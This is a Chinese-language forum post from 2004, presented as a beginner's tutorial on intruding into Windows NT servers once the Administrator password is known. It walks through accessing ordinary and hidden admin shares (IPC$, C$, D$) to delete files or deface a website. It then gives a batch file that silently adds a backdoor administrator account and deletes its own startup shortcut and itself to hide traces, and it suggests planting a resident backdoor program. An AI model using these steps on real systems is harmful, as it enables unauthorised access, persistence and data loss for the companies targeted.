bababa
Groupie
加入: 2004/5月/29
Online Status: Offline
回復: 46
|
| Posted: 2004/5月/29 5:28下午 | IP記錄
|
|
|
現在的企業當中一般都是使用的NT系統,也不得不承認,NT系統的確是非常適合企業使用的操作系統,然而「駭客」的攻擊引來了企 業訊息安全危機……
得到了NT的管理員密碼還能做什麼,還不是想做什麼就做什麼唄。但到底能做什麼呢?能詳細答出來的只怕不會很多,而且很多企 業系統管理員就認為密碼為空沒什麼,因為他們壓根就不知道「駭客」會怎麼做。本文介紹的就是得到NT的管理員密碼以後入侵一個企 業電腦群的初級和中級手法,尤其是在一個大型企業當中,企業系統管理員的密碼往往關係著整個公司的訊息洩密,以及公司的資料的丟 失,嚴重的影響到一個企業的發展和生存。
首先,我們先假定得到了某個企業的一台服務器192.168.0.1的Administrator的密碼,而對方沒有關閉1 39端口。
1.普通共享資源的入侵
這種入侵手法可說是NT最簡單的入侵了。隨便在自己機器的哪個視窗的地址欄裡輸入「\\192.168.0.1」大概等1- 2秒,對方就會要求你輸入使用者名和密碼,輸入所得到的使用者名和密碼以後就可以進入,並可以看到這台服務器在企業中的共享資源 了。由於權限是Admin所以你幾乎可以刪除對方共享資源裡的任何東西。(如果設置了共享為只讀那就沒辦法了)
2.默認及隱藏共享資源的入侵
在說這種入侵方法之前我先來給大家介紹一個NT的IPC$連接,在默認情況下NT系統有一個特殊的隱藏共享,就是IPC$共 享。IPC$是專門用在NT中的一種管道通訊,NT系統之間的通訊大部分都在IPC$通訊中完成的。
這次手法相對高明一點,但還是很簡單的。不過關鍵還是要看「駭客」如何利用了,有的人可能只能刪刪文件,有的人卻可以利用這 個留下後門,以便下次如果密碼改變了後可以利用後門進入。同樣在機器裡隨便打開一個視窗,在地址欄輸入「\\192.168.0 .1」就會要求輸入密碼,輸入以後所看到的東西和前面介紹的一樣。好了,現在同時也建立好IPC$連接了,其實在提示你輸入密碼 時從輸入視窗中也知道了是建立IPC$連接。然後我們再次在地址欄輸入地址,這次輸入的就有點不同了,輸入「\\192.168 .0.1\c$」大概過一會就出現了對方C盤裡所有的內容了。想看對方D盤嗎?同樣,輸入「\\192.168.0.1\D$」 就看見對方D盤了。然後想換這個企業的首頁(假如對方還是一個Web服務器)可以說是輕而易舉。記住由於權限是管理員當然可以寫 了,留不留後門就看「駭客」的想法咯。一般他們會在C盤(假設在C:\\WINNT下)建立一個批處理文件,假設文件名為hac k.bat,其內容一般為:
net user hack 1234 /add (建立一個使用者名為hack的使用者,密碼為1234)
net localgroup administrators hack /add (讓hack也是管理員)
del C:\Documents and Settings\Administrator\開始\選單\程式\啟動\hack.lnk (刪除啟動文件夾裡的快捷方式消除足跡)
del c:\winnt\hack.bat (刪除hack.bat這個文件消除足跡)
這樣當企業系統管理員在下次登錄時就會偷偷的增加一個使用者了。當然其實增加使用者算是一個比較愚蠢的留「後門」的方法了, 所以其實很多「駭客」會放一個可以常駐內存的小程式,然後建立一個類似的批處理文件和快捷方式,那麼「駭客」基本上可以長期的佔 有企業中的這台主機了。
|
標題 
名單 
搜索 
Help
注冊 
登入
DoReMe : 電腦綜合討論區
話題: NT完全入侵教程(新手篇)
